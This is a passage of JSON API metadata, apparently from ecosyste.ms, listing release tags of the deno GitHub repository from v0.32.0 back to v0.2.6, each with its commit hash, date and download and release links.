rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repo